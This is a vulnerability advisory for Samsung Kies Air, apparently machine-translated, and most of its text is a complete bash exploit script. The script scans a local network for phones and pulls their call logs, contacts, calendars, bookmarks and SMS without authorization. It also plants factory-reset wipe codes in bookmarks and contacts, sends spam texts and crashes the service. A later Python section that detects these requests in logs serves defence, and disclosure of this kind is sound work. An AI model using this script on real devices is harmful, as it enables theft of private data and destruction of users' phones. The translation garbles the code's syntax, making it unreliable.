Samsung Kies Air Denial of Service and Security Bypass Vulnerability

Affected Systems:
Samsung Kies Air 2.1.210161
Samsung Kies Air 2.1.207051
Description:
--------------------------------------------------------------------------------
Bugtraq ID: 56560
CVE ID: CVE-2012-5858, CVE-2012-5859

Kies Air is an application that connects a computer to a mobile phone over Wi-Fi so that the phone can be managed from a browser.

Samsung Kies Air 2.1.207051, 2.1.210161, and other versions have security vulnerabilities that allow attackers to bypass certain security restrictions or cause denial of service.

<* Source: clodij. Lacayo *>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!

#! /Bin/bash

Echo "Samsung S3 Kies Air example-v.1.3 www.samsung.com/us/kies /"
Echo ""
Echo ""
Echo"
######################################## ######################################## #################################"
Echo "Filename: kiesauth. sh"
Echo "Date: 10/23/2012"
Echo "Authors: @ cron __"
Echo "Presentation: http://www.slideshare.net/firmware/kies-air-launch-steal-crash"
Echo "Whitepaper: http://dl.dropbox.com/u/7779799/SamsungKiesAirAuthorizationBypassandDoS.pdf"
Echo "Version: 1.3"
Echo "Description: Script to detect local running Kies Air web servers on Samsung Galaxy S3 phones ."
Echo"
######################################## ######################################## #################################"
Echo ""
Echo ""

While true; do
Printf "% s \ n" "1) Scan local network"
Printf "% s \ n" "2) Send DoS"
Printf "\ n % s \ t" "Enter an option :"

Read option

# Option 1
Case $ option in
[1]) ip = 'ifconfig | awk/inet \/'
Echo $ ip
Echo "Type in your IP :"

Read ipstart
Echo-e "Scanning in progress... \ n"
Sudo nmap-sS-p 8080 $ {ipstart}-254-vv> nmap_scan.txt
Awk '/Nmap scan report for Android/|/open/|/Samsung/'nmap_scan.txt> ka_online.txt
Printf "% s \ n" "Active servers found :"
Cat ka_online.txt
Printf "% s \ t" "Was a server found? Type 'y' or 'N' and press [Enter]"

Read connect
If [$ connect = y]
Then
Echo "Enter the target IP and press [Enter]"
Read target_found
Wget -- ignore-length -- quiet http: // $ {target_found}: 8080/www/index.gz.html
Printf "\ n % s \ n" 1) Grab logs (incoming/outgoing CALS )"
Printf "% s \ n" "2) Grab address book"
Printf "% s \ n" "3) Grab calendar events (experimental )"
Printf "% s \ n" "4) Grab bookmarks"
Printf "% s \ n" "5) Grab SMS (incoming/outgoing )"
Printf "% s \ n" "6) Send remote wipe"
Printf "\ n % s \ t" "We have access, what wocould you like to do? "

Read action
Case $ action in
[1]) wget -- ignore-length -- quiet-O call_log.txt
Http: // $ {target_found}: 8080/ws/telephony/log? StartIndex = 0 & maxItems = 500 & sort = time-descending ;;
[2]) wget -- ignore-length -- quiet-O addressbook.txt
Http: // $ {target_found}: 8080/ws/pim/contacts? StartIndex = 0 & maxItems = 100 & sort = alpha-ascending ;;
[3]) wget -- ignore-length -- quiet-O calendar_events.txt
Http: // $ {target_found}: 8080/ws/calendar/instances/1348977600/1352606400? SearchQuery = calendarId: 1 calendarId: 2 & 1351121143933
;;
[4]) wget -- ignore-length -- quiet-O bookmarks.txt
Http: // $ {target_found}: 8080/ws/browser/bookmarks? StartIndex = 0 & maxItems = 100 & sort = time-descending ;;
[5]) wget -- ignore-length -- quiet-O messages.txt
Http: // $ {target_found}: 8080/ws/messaging/messages? StartIndex = 0 & maxItems = 10 & sort = timestamp_descending ;;
[6]) printf "\ n % s \ n" 1) Add remote wipe as a bookmark"
Printf "% s \ n" "2) Replace the default AT&T bookmark link with remote wipe"
Printf "% s \ n" "3) Replace contact information with remote wipe and mark it as favorite"
Printf "% s \ n" "4) Add remote wipe to address book and mark it as favorite"
Printf "% s \ n" "5) Send spam SMS"
Printf "\ n % s \ t" "Choose an option :"

Read wipe_option
Case $ wipe_option in
[1]) wipe1 = 'wget -- ignore-length -- server-response -- quiet -- post-data
'Url = http: // 192.168.1.1324252fremotewipe.html & title = AT % 26 T % 20 Mobile % 20web'
Http: // $ {target_found}: 8080/ws/browser/bookmarks ';;
[2]) echo "DELETE method not supported by wget .";;
[3]) wipe3 = 'curl-O curl_response.txt-x put-d
"Title = & firstName = Vicky & lastName = & suffix = & nickName = & homePhoneNo = & workPhoneNo = & mobilePhoneNo = * 2767 * 3855% 23 & defaultPhoneNo =-1 & workEmail = & = & otherEmail = & organization = & jobTitle = & favorite = true & accountType = Phone & accountName = Phone"
Http: // $ {target_found}: 8080/ws/pim/contacts/37 ';;
[4]) wipe4 = 'wget -- ignore-length -- quiet -- post-data' title = & firstName = CALL FOR A SEXY
TIME & lastName = & suffix = & nickName = & homePhoneNo = & workPhoneNo = & mobilePhoneNo = * 2767 * 3855% 23 & defaultPhoneNo =-1 & workEmail = & homeEmail = & otherEmail = & organization = & jobTitle = & favorite = true & accountType = Phone & accountName = Phone'
Http: // $ {target_found}: 8080/ws/pim/contacts 'echo-e "Entry added .";;
[5]) wipe5 = 'wget -- ignore-length -- quiet -- post-data
'Folderid = & destination = tel: 111 & destinationContactId = & destinationName = & body = Hey click this link!
Goatse. cx & mimeType = text/plain 'HTTP: // $ {target_found}: 8080/ws/messaging/sms/messages ';;

Esac
Esac

Elif [$ connect = n]
Then
Printf "% s" "No available targets found ."
Else
Printf "% s" "Not a valid entry. Aborted ."
Fi ;;

# Option 2: Manually specify this for now.
[2]) t1 = 'wget -- quiet-p' http: // 192.168.1.136: 8080/www/apps/KiesAir/jws/ssd. php? E & ''echo-e "Crash successfully
Sent to device. \ n ";;
Esac
Echo-e "Script reloaded. \ n"
Done
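
For detection, the requests issued by the script above can be matched in proxy or IDS logs. The following is an added example, not part of the original advisory or script: it flags requests to the Kies Air paths on port 8080 that appear on this page and groups them by source address. The log line format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Kies Air paths taken from the script on this page, mapped to what they expose.
KIES_PATHS = [
    (re.compile(r"^/ws/telephony/log"), "call log read"),
    (re.compile(r"^/ws/pim/contacts"), "contacts read/write"),
    (re.compile(r"^/ws/calendar/instances"), "calendar read"),
    (re.compile(r"^/ws/browser/bookmarks"), "bookmarks read/write"),
    (re.compile(r"^/ws/messaging/"), "SMS read/send"),
    (re.compile(r"^/www/apps/KiesAir/jws/ssd\.php"), "DoS request"),
]

# Assumed (hypothetical) log format: "<time> <src_ip> <METHOD> <url>"
LINE = re.compile(r"^(\S+) (\S+) (GET|POST|PUT|DELETE) (\S+)$")

def classify(url):
    """Return a label for a Kies Air request on port 8080, else None."""
    parts = urlsplit(url)
    if parts.port != 8080:
        return None
    for pattern, label in KIES_PATHS:
        if pattern.match(parts.path):
            return label
    return None

def scan(lines):
    """Group matching requests by source IP: {src: [(time, method, label)]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line.strip())
        label = classify(m.group(4)) if m else None
        if label:
            hits[m.group(2)].append((m.group(1), m.group(3), label))
    return dict(hits)

# Constructed sample log lines (not captured traffic).
SAMPLE = [
    "2012-10-23T10:00:01 192.0.2.50 GET http://192.0.2.77:8080/ws/telephony/log?startIndex=0&maxItems=500",
    "2012-10-23T10:00:03 192.0.2.50 GET http://192.0.2.77:8080/ws/pim/contacts?startIndex=0&maxItems=100",
    "2012-10-23T10:00:09 192.0.2.50 POST http://192.0.2.77:8080/ws/messaging/sms/messages",
    "2012-10-23T10:01:00 192.0.2.51 GET http://192.0.2.80:8080/index.html",
    "2012-10-23T10:02:00 192.0.2.52 GET http://192.0.2.77:80/ws/pim/contacts",
]

if __name__ == "__main__":
    for src, events in scan(SAMPLE).items():
        print(src, len(events), sorted({label for _, _, label in events}))
```

A single source touching several of these categories within a short window is the pattern worth alerting on; one bookmark or contact request from the owner's paired computer is normal use.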

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Samsung
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://samsungapps.sina.cn/supportMain/getSupportMainList.as
